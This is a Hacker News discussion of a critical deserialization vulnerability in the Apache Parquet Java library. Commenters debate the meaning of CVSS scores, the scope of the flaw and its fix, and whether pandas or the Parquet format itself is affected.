tptacek 2 days ago

Broken record, but "has a CVSS score of 10.0" is literally meaningless. In fact, over the last couple years, I've come to take vulnerabilities with very high CVSS scores less seriously. Remember, Heartbleed was a "7.5".

  • pclmulqdq 2 days ago

    I am pretty convinced that CVSS has a very significant component of "how enterprise is it." Accepting untrusted parquet files without verification or exposing apache spark directly to users is a very "enterprise" thing to do (alongside having log4j log untrusted user inputs). Heartbleed sounded too technical and not "enterprise" enough.

    • positr0n 2 days ago

      > alongside having log4j log untrusted user inputs

      I'd think logging things like query parameters is extremely common.

  • marcolussetti 2 days ago

    That's mostly due to the switch from CVSS 2 to CVSS 3

  • tgv 2 days ago

    It may be noisy, but recently Draytek routers had a 10 point one, and indeed, an office router had been taken over. It would stubornly reboot every couple of minutes, and not accept upgrades.

  • junon 2 days ago

    Yep. Any software these days can be "network accessible" if you put a server in front of it; that's usually what pumps the score up.

  • b8 2 days ago

    A new scoring system should be made that is a better signal.

    • tptacek 2 days ago

      I think the original one did just fine: "info, low, medium, high, crit".

      I could even do without "crit".

      • worthless-trash 2 days ago

        I believe companies often call that the flaws impact.

        It is different than the cvss rating.

        • tptacek 2 days ago

          In that it is meaningful, yes.

          • worthless-trash 2 days ago

            Surely you think AV:P has a meaningful description in the CVSS Score ?

    • saagarjha 2 days ago

      It's quite hard to do this.

jtchang 2 days ago

It's so dumb to assign it a CVSS score of 10.

Unless you are blindly accepting parquet formatted files this really doesn't seem that bad.

A vulnerability in parsing images, xml, json, html, css would be way more detrimental.

I can't think of many services that accept parquet files directly. And of those usually you are calling it directly via a backend service.

  • jeroenhd 2 days ago

    Unless you're logging user input without proper validation, log4j doesn't really seem that bad.

    As a library, this is a huge problem. If you're a user of the library, you'll have to decide if your usage of it is problematic or not.

    Either way, the safe solution is to just update the library. Or, based on the link shared elsewhere (https://github.com/apache/parquet-java/compare/apache-parque...) maybe avoid this library if you can, because the Java-specific code paths seem sketchy as hell to me.

    • seanhunter 2 days ago

      It’s incredibly common to log things which contain text elements which come from a user request. I’ve worked on systems that do that 100s of thousands of times per day. I’ve literally never deserialized a parquet file that came from someone else even a single time and I’ve used parquet since it very first was released.

    • ajross 2 days ago

      > Unless you're logging user input without proper validation, log4j doesn't really seem that bad.

      Most systems do log user input though, and "proper validation" is an infamously squishy phrase that mostly acts as an excuse. The bottom line is that the natural/correct/idiomatic use of Log4j exposed the library directly to user-generated data. The similar use of Apache parquet (an obscure tool many of us are learning about for the first time) does not. That doesn't make it secure, but it makes the impact inarguably lower.

      I mean, come on: the Log4j exploit was a global zero-day!

      • jeroenhd 2 days ago

        > Most systems do log user input though, and "proper validation" is an infamously squishy phrase that mostly acts as an excuse

        That's my point: if you start adding constraints to a vulnerability to reduce its scope, high CVE scores don't exist.

        Any vulnerability that can be characterised as "pass contents through parser, full RCE" is a 10/10 vulnerability for me. I'd rather find out my application isn't vulnerable after my vulnerability scanner reports a critical issue than let it lurk with all the other 3/10 vulnerabilities about potential NULL pointers or complexity attacks in specific method calls.

        • ajross 2 days ago

          > Any vulnerability that can be characterised as "pass contents through parser, full RCE" is a 10/10 vulnerability for me

          And I think that's just wildly wrong sorry. I view something exploited in the wild to compromise real systems as a higher impact than something that isn't, and want to see a "score" value that reflects that (IMHO, critical) distinction. Agree to disagree, as it were.

  • SpicyLemonZest 2 days ago

    The score is meant for consumption by users of the software with the vulnerability. In the kind of systems where Parquet is used, blindly reading files in a context with more privileges than the user who wrote them is very common. (Think less "service accepting a parquet file from an API", more "ETL process that can read the whole company's data scanning files from a dump directory anyone can write to".)

    • seanhunter 2 days ago

      I get the point you’re making but I’m gonna push back a little on this (as someone who has written a fair few ETL processes in their time). When are you ever ETLing a parquet file? You are always ETLing some raw format (css, json, raw text, structured text, etc) and writing into parquet files, never reading parquet files themselves. It seems a pretty bad practise to write your etl to just pick up whatever file in whatever format from a slop bucket you don’t control. I would always pull files in specific formats from such a common staging area and everything else would go into a random “unstructured data” dump where you just make a copy of it and record the metadata. I mean it’s a bad bug and I’m happy they’re fixing it, but it feels like you have to go out of your way to encounter it in practice.

  • bigfatkitten 2 days ago

    Vendor CVSS scores are always inherently meaningless because they can't take into account the factors specific to the user's environment.

    Users need to do their own assessments.

    • worthless-trash 2 days ago

      This comment over generalises the problem, but is inherently absurd. There are key indicators in scoring that explain the attack itself which isn't environment specific.

      I do agree that in most cases the deployment specific configuration affects the ability to be exploited and users or developers should analyse their own configuration.

formerly_proven 3 days ago

As per the PoC, yes — this is the usual Java Deserialization RCE where it’ll instantiate arbitrary classes. Java serialization really is a gift that keeps on giving.

  • stefan_ 3 days ago

    I love how these always instantly escalate into trivial code execution / reverse shell. Remember kids, C is the enemy!

    The "fix" in question also screams "delete this crap immediately": https://github.com/wgtmac/parquet-mr/commit/d185f867c1eb968a...

    • hinkley 3 days ago

      The fix still loads the class before checking if it’s okay.

      That’s a smaller attack window but it’s still not zero.

      • josefx 2 days ago

        Java reflection can load classes without initializing them, so no untrusted code would have to be executed at that point.

        • hinkley 2 days ago

          I haven’t been in Java for a good while. When did they do that?

          Static initializers used to load on Classloader calls.

          • josefx 2 days ago

            An overload for Class.forName with an explicit initialize parameter was added in Java 1.2 .

            • hinkley 2 days ago

              Except they don't call Class.forName(..., false, ...) anywhere in the codebase, so my original comment still stands.

    • pclmulqdq 3 days ago

      This is a bug in Java. Java is considered "memory safe" because of its GC and its VM. This is not a memory safety bug.

      • chowells 2 days ago

        It's true. No memory is being used in contravention of the language semantics. Absolutely memory safe.

g-mork 3 days ago

When did vulnerability reports get so vague? Looks like a classic serialization bug

https://github.com/apache/parquet-java/compare/apache-parque...

  • amluto 3 days ago

    Better link: https://github.com/apache/parquet-java/pull/3169

    If by “classic” you mean “using a language-dependent deserialization mechanism that is wildly unsafe”, I suppose. The surprising part is that Parquet is a fairly modern format with a real schema that is nominally language-independent. How on Earth did Java class names end up in the file format? Why is the parser willing to parse them at all? At most (at least by default), the parser should treat them as predefined strings that have semantics completely independent of any actual Java class.

    • bri3d 2 days ago

      This seems to come from parquet-avro, which looks to attempt to embed Avro in Parquet files and in the course of doing so, does silly Java reflection gymnastics. I don’t think “normal” parquet is affected.

      • tikhonj 2 days ago

        Last time I tried to use the official Apache Parquet Java library, parsing "normal" Parquet files depended on parquet-avro because the library used Avro's GenericRecord class to represent rows from Parquet files with arbitrary schemas. So this problem would presumably affect any kind of Parquet parsing, even if there is absolutely no Avro actually involved.

        (Yes, this doesn't make sense; the official Parquet Java library had some of the worst code design I've had the misfortune to depend on.)

        • twoodfin 2 days ago

          Indeed, given the massive interest Parquet has generated over the past 5 years, and its critical role in modern data infrastructure, I’ve been disappointed every time I’ve dug into the open source ecosystem around it for one reason or another.

          I think it’s revealing and unfortunate that everyone serious about Parquet, from DuckDB to Databricks, has written their own “codec”.

          Some recent frustrations on this front from the DuckDB folks:

          https://duckdb.org/2025/01/22/parquet-encodings.html

          • dev_l1x_be 2 days ago

            Unfortunately many of the big data libraries are like that and there is no motivation to fix these things. One example is the ORC Java libraries that had 100s of unnecessary dependencies while at the same time importing the filesystem into the format itself.

        • jeeeb 2 days ago

          The Apache Arrow libraries are a good alternative for reading parquet files in Java. They provide a column oriented interface, rather than the ugly Avro stuff in the Apache Parquet library.

      • amluto 2 days ago

        The documentation for all of this is atrocious.

        But if avro-in-parquet is a weird optional feature, it should be off by default! Parquet’s metadata is primarily in Thrift, not Avro, and it seems to me that no Avro should be involved in decoding Parquet files unless explicitly requested.

        • bri3d 2 days ago

          To the sibling comment’s point, I suppose it’s not weird in the Java ecosystem. The parquet-java project has a design where it deserializes Parquet fields into Java representations grabbed from _other_ projects rather than either having some kind of canonical self-representation in memory or acting as just an abstract codec. So, one of the most common things to do is apparently to use the “Avro” flavored serdes to get generic records in memory (note that the actual Avro serialization format is not involved with doing that; parquet-java just uses the classes from Avro as the in memory representations and deserializes Parquet into them). The whole approach seems a bit goofy; I’d expect the library to work as some kind of abstracted codec interface (requiring the in-memory representations to host Parquet, rather than the other way around - like how pandas hosts fastparquet in Python land) or provide a canonical object representation. Instead, it’s this in between where it has a grab bag of converters that transform Parquet to and from random object types pulled from elsewhere in the Java ecosystem.

          • amluto 2 days ago

            I’d still like to see a clear explanation of where one can stick a Java class name in a Parquet file such that it ends up interpreted by the Avro codec. And I’m curious why it was fixed by making a list of allowed class names instead of disabling the entire mechanism.

  • hypeatei 2 days ago

    Tangential, but there was a recent sandbox escape vulnerability in both Chrome and Firefox.

    The bug threads are still private, almost two weeks since it was disclosed and fixed. Very strange.

    https://bugzilla.mozilla.org/show_bug.cgi?id=1956398

    https://issues.chromium.org/issues/405143032

    https://www.cve.org/CVERecord?id=CVE-2025-2783

3eb7988a1663 3 days ago

Maybe the headline should note that this a parser vulnerability, not the format itself. I suppose that is obvious, but my first knee-jerk thought was, "Am I going to have to re-encode XXX piles of data?"

  • necubi 2 days ago

    Also that it's in the Java parquet library, which somehow is nowhere in the article

  • brokensegue 2 days ago

    What would it mean for the vulnerability to be in the format and not the parser?

    • 3eb7988a1663 2 days ago

      I don't know. Something like a Python pickle file where parsing is unavoidable.

      On a second read, I realized a format problem was unlikely, but the headline just said, "Apache Parquet". My mind might the same conclusion if it said "safetensors" or "PNG".

    • jonstewart 2 days ago

      That data had to be encoded in a certain way which would lead to unavoidable exploitation in every conforming implementation. For example, PDF permits embedded JavaScript and… that has not gone well.

    • dist-epoch 2 days ago

      Macros in old Microsoft Word documents were quite a popular attack.

nikanj 3 days ago

"Maximum severity RCE" no longer means "unauthenticated RCE by any actor", it now means "the vulnerability can only be exploited if a malicious file is imported"

Grumbling about CVE inflation

  • marcusb 3 days ago

    CVSS, at least in its current form, needs to be taken out back and shot. See, for instance, https://daniel.haxx.se/blog/2025/01/23/cvss-is-dead-to-us/

    • buu700 2 days ago

      I like the idea of CVSS, but it's definitely less precise than I'd like as-is. e.g. I've found that most issues which I would normally think of as low-severity get bumped up to medium by CVSS just for being network-based attack vectors, even if the actual issue is extremely edge case, extremely complex and/or computationally expensive to exploit, or not clearly exploitable at all.

  • kevincox 2 days ago

    But Parquet is intended to be a safe format. So importing a malicious file should still be safe.

    Like if a browser had a vulnerability parsing HTML of course it is a major concern because very often browsers to parse HTML from untrusted parties.

    • mr_mitm 2 days ago

      Why is "user interaction: none" though? There should be reasoning attached to the CVSS vector in these CVEs.

      • StressedDev 2 days ago

        Probably because there are services (AKA web services, software listening on a network port, etc.) out there which accept arbitrary Parquet files. This seems like a safe assumption given lots of organizations use micro-services or cloud venders use the same software on the same machine to process requests from different customers. This is a bad bug and if you use the affected code, you should update immediately.

  • tptacek 2 days ago

    There's no such thing as CVE inflation because CVEs don't have scores. You're grumbling about CVSS inflation. But: CVSS has always been flawed, and never should have been taken seriously.

    • sean_flanigan 2 days ago

      Those CVE numbers go up every year… Sounds like inflation to me! ;-)

lpapez 2 days ago

Soon to be announced "Quake PAK files identified carrying malware, critical 10/10 vulnerability"

marginalia_nu a day ago

I migrated off apache parquet to a very simple columnar format. Cut processing times in half, reduced RAM usage by almost 90%, and (as it turns out) dodged this security vulnerability.

I don't want to make too harsh remarks about the project, as it may simply not have been the right tool for my use case, though it sure gave me a lot of issues.

ustad 3 days ago

Does anyone know if pandas is affected? I serialize/deserialize dataframes which pandas uses parquet under the hood.

  • minimaxir 3 days ago

    Pandas doesn't use the parquet python package under the hood: https://pandas.pydata.org/docs/reference/api/pandas.read_par...

    > Parquet library to use. If ‘auto’, then the option io.parquet.engine is used. The default io.parquet.engine behavior is to try ‘pyarrow’, falling back to ‘fastparquet’ if ‘pyarrow’ is unavailable.

    Those should be unaffected.

    • westurner 3 days ago

      Python pickles have the same issue but it is a design decision per the docs.

      Python docs > library > pickle: https://docs.python.org/3/library/pickle.html

      Re: a hypothetical pickle parser protocol that doesn't eval code at parse time; "skipcode pickle protocol 6: "AI Supply Chain Attack: How Malicious Pickle Files Backdoor Models" .. "Insecurity and Python Pickles" : https://news.ycombinator.com/item?id=43426963

      • echoangle 2 days ago

        But python pickle is only supposed to be used with trusted input, so it’s not a vulnerability.

  • natebc 3 days ago

    https://www.endorlabs.com/learn/critical-rce-vulnerability-i...

    > Any application or service using Apache Parquet Java library versions 1.15.0 or earlier is believed to be vulnerable (our own data indicates that this was introduced in version 1.8.0; however, current guidance is to review all historical versions). This includes systems that read or import Parquet files using popular big-data frameworks (e.g. Hadoop, Spark, Flink) or custom applications that incorporate the Parquet Java code. If you are unsure whether your software stack uses Parquet, check with your vendors or developers – many data analytics and storage solutions include this library.

    Seems safe to assume yes, pandas is probably affected by using this library.

    • nindalf 3 days ago

      The paragraph you pasted in states that only applications importing the Java library are vulnerable.

      Isn’t pandas implemented in Python/C? How would it have been importing the Java library?

      • natebc 2 days ago

        I'm sorry. I made a mistake.

    • 3eb7988a1663 3 days ago

      That does not follow for me. Pandas does not utilize Java/JVM.

      • natebc 2 days ago

        I'm sorry. I made a mistake.

yencabulator 16 hours ago

In the parquet-java *Java implementation of Apache Parquet*.

Not in the file format.

rini17 2 days ago

Never roll your own deserialization :)

  • junon 2 days ago

    That's not the takeaway here.